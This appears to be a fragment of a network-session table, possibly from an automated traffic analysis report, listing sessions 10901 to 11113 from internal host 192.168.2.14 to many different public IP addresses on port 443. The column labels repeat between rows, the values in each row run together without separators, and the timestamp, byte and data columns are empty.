                                                      10901192.168.2.1460344146.112.143.161443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10902192.168.2.1434006169.97.241.94443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10903192.168.2.1439778195.52.179.40443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10904192.168.2.1442930161.248.89.43443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10905192.168.2.14494542.141.150.232443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10906192.168.2.143760282.13.141.194443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10907192.168.2.14439289.69.51.145443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10908192.168.2.1446046145.1.237.113443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10909192.168.2.1448360189.92.172.191443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10910192.168.2.146064660.192.93.88443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10911192.168.2.14459708.72.101.130443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10912192.168.2.1442608223.183.4.34443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10913192.168.2.143656894.158.244.177443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10914192.168.2.1447396121.93.90.112443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10915192.168.2.1451176176.1.47.223443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10916192.168.2.144953836.252.16.51443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10917192.168.2.144167093.123.129.240443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10918192.168.2.145735047.24.229.84443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10919192.168.2.14563289.231.2.237443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10920192.168.2.1435266159.38.69.20443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10921192.168.2.1437436108.143.77.100443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10922192.168.2.1439488147.64.185.154443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10923192.168.2.145056895.137.142.194443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10924192.168.2.1449336147.32.177.151443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10925192.168.2.1449972194.76.7.75443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10926192.168.2.143692814.97.153.13443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10927192.168.2.143312463.35.179.235443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10928192.168.2.144965070.153.70.188443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10929192.168.2.143590269.78.42.173443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10930192.168.2.144140089.77.245.96443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10931192.168.2.1439082112.73.130.107443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10932192.168.2.143316651.147.9.63443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10933192.168.2.143375081.94.165.191443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10934192.168.2.1438378194.181.87.65443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10935192.168.2.1439620222.66.242.172443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10936192.168.2.144961699.170.89.241443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10937192.168.2.1446004199.139.212.37443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10938192.168.2.1446738222.35.190.150443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10939192.168.2.144996623.137.49.27443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10940192.168.2.144113636.178.81.146443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10941192.168.2.143739488.190.199.71443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10942192.168.2.143585652.95.69.159443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10943192.168.2.1448966148.156.36.96443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10944192.168.2.1441554108.211.240.159443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10945192.168.2.145277648.91.230.159443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10946192.168.2.1443812135.175.178.122443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10947192.168.2.1460486150.27.88.133443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10948192.168.2.1451698190.94.183.140443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10949192.168.2.1435682206.199.4.41443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10950192.168.2.1435380100.176.26.10443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10951192.168.2.1449518129.30.143.197443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10952192.168.2.144872235.64.115.211443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10953192.168.2.1439046200.241.188.241443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10954192.168.2.144210243.201.101.249443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10955192.168.2.1449040184.240.195.230443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10956192.168.2.1454960176.141.201.160443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10957192.168.2.1438064171.106.134.220443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10958192.168.2.1459460183.84.139.134443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10959192.168.2.143625232.105.76.170443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10960192.168.2.1446924148.71.191.147443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10961192.168.2.1438464158.55.41.155443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10962192.168.2.1433368105.137.227.65443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10963192.168.2.145838223.123.158.94443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10964192.168.2.144475254.70.125.170443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10965192.168.2.1447802181.157.190.204443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10966192.168.2.1454610142.118.255.86443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10967192.168.2.1447216156.52.11.248443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10968192.168.2.1439404114.231.101.42443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10969192.168.2.14483564.142.75.52443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10970192.168.2.143744492.93.144.118443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10971192.168.2.1442940107.28.222.189443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10972192.168.2.143470099.182.130.1443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10973192.168.2.1460156166.27.24.4443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10974192.168.2.145152020.65.102.230443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10975192.168.2.146072643.253.250.18443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10976192.168.2.144108492.115.226.95443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10977192.168.2.144794471.84.211.47443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10978192.168.2.1447864116.39.88.202443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10979192.168.2.145649285.54.180.30443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10980192.168.2.145503223.125.25.81443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10981192.168.2.1438950132.4.209.45443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10982192.168.2.144646680.140.70.100443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10983192.168.2.14394964.88.179.152443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10984192.168.2.1433400210.30.76.66443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10985192.168.2.144639882.174.226.88443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10986192.168.2.144657264.136.88.169443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10987192.168.2.1447136114.169.142.233443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10988192.168.2.1441332183.11.176.187443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10989192.168.2.144372240.206.91.33443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10990192.168.2.145834690.122.85.73443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10991192.168.2.1460086161.0.83.96443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10992192.168.2.1434442185.230.197.114443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10993192.168.2.144109476.52.104.42443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10994192.168.2.1455866104.151.205.248443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10995192.168.2.1459214110.205.24.234443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10996192.168.2.144207077.87.205.120443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10997192.168.2.1433230157.218.208.75443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10998192.168.2.1439056183.167.82.202443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10999192.168.2.1433120208.233.68.173443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11000192.168.2.144129241.192.20.132443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11001192.168.2.1448698169.232.130.149443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11002192.168.2.1451362139.207.130.238443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11003192.168.2.145076883.188.252.79443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11004192.168.2.1454568145.27.93.197443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11005192.168.2.1434850180.109.180.60443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11006192.168.2.1442898185.149.24.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11007192.168.2.1449216148.147.130.232443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11008192.168.2.144111027.245.8.170443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11009192.168.2.1453488136.178.186.65443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11010192.168.2.1437088199.142.116.165443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11011192.168.2.145398083.202.229.66443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11012192.168.2.145882278.180.71.179443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11013192.168.2.1455790115.186.8.195443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11014192.168.2.1439270193.15.152.252443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11015192.168.2.1443618190.230.100.231443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11016192.168.2.1446884147.141.184.175443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11017192.168.2.145524081.27.3.157443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11018192.168.2.1454934184.154.207.43443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11019192.168.2.1440714151.218.188.118443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11020192.168.2.1435956168.131.192.124443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11021192.168.2.1439872117.7.73.169443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11022192.168.2.144125898.205.27.89443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11023192.168.2.1435652120.155.252.104443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11024192.168.2.1452112172.124.86.191443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11025192.168.2.1442916192.125.178.172443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11026192.168.2.145700095.132.80.209443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11027192.168.2.1451892175.145.195.59443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11028192.168.2.145383467.22.240.153443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11029192.168.2.144957488.31.54.123443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11030192.168.2.144476490.135.209.213443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11031192.168.2.145061897.76.0.184443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11032192.168.2.1435938191.119.31.197443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11033192.168.2.1445392146.227.101.238443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11034192.168.2.1455630149.225.177.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11035192.168.2.143621246.122.184.66443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11036192.168.2.1452744176.15.198.217443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11037192.168.2.1453392137.65.44.216443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11038192.168.2.144501858.32.172.27443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11039192.168.2.1453810111.193.13.70443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11040192.168.2.1442514219.221.97.196443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11041192.168.2.143938673.165.125.175443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11042192.168.2.1458324117.148.219.215443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11043192.168.2.1441226201.126.108.250443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11044192.168.2.144252051.209.132.183443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11045192.168.2.144203269.103.102.135443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11046192.168.2.145156897.166.11.146443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11047192.168.2.1439032184.94.195.30443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11048192.168.2.1458918190.21.61.154443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11049192.168.2.144260046.86.54.111443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11050192.168.2.1448308185.220.129.81443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11051192.168.2.1450146208.75.106.34443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11052192.168.2.1435560150.183.188.42443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11053192.168.2.1445954196.33.227.18443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11054192.168.2.146003246.166.132.79443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11055192.168.2.143904268.60.184.61443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11056192.168.2.1443340131.172.72.200443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11057192.168.2.144008672.141.139.168443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11058192.168.2.143991298.211.109.236443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11059192.168.2.145966495.52.44.103443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11060192.168.2.1457430195.0.166.56443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11061192.168.2.145008045.141.250.169443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11062192.168.2.144068024.13.238.226443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11063192.168.2.143477079.220.137.112443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11064192.168.2.145671279.224.222.225443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11065192.168.2.145023817.34.41.175443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11066192.168.2.1436986155.46.196.209443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11067192.168.2.145708480.162.19.242443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11068192.168.2.1459116180.53.84.229443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11069192.168.2.1447824208.0.60.67443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11070192.168.2.145398278.231.133.83443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11071192.168.2.1458826172.188.154.47443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11072192.168.2.145743860.110.72.35443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11073192.168.2.1437172140.130.222.23443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11074192.168.2.145194860.143.88.236443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11075192.168.2.144642034.195.158.82443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11076192.168.2.144500027.176.251.246443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11077192.168.2.143368851.24.56.70443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11078192.168.2.144432073.91.136.77443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11079192.168.2.1436274118.140.152.255443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11080192.168.2.1449814116.214.239.88443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11081192.168.2.144109018.109.203.215443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11082192.168.2.1444984192.228.161.194443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11083192.168.2.145417884.112.178.105443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11084192.168.2.1453864168.70.210.159443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11085192.168.2.1447892203.27.223.246443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11086192.168.2.145441438.5.46.91443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11087192.168.2.1440428217.173.104.1443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11088192.168.2.1454332200.169.169.93443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11089192.168.2.1433564203.216.201.41443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11090192.168.2.1440130104.15.44.52443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11091192.168.2.145513098.61.73.99443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11092192.168.2.1448070212.90.113.156443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11093192.168.2.1440570134.136.19.191443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11094192.168.2.1444018109.43.40.190443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11095192.168.2.1444912121.49.169.30443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11096192.168.2.1458458143.209.211.254443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11097192.168.2.144920669.173.143.76443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11098192.168.2.1433502141.166.29.210443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11099192.168.2.144671619.58.90.181443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11100192.168.2.1433126194.131.106.37443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11101192.168.2.1447708167.233.18.48443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11102192.168.2.145892857.227.73.162443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11103192.168.2.145508613.254.103.42443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11104192.168.2.1436298143.29.106.87443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11105192.168.2.1446248132.180.72.70443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11106192.168.2.1446218135.248.217.24443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11107192.168.2.1437884195.176.140.191443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11108192.168.2.1439512207.99.133.71443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11109192.168.2.143620685.18.154.217443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11110192.168.2.143834695.222.163.238443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11111192.168.2.145595260.166.60.177443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11112192.168.2.1457688193.112.181.101443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11113192.168.2.1450126194.177.159.97443
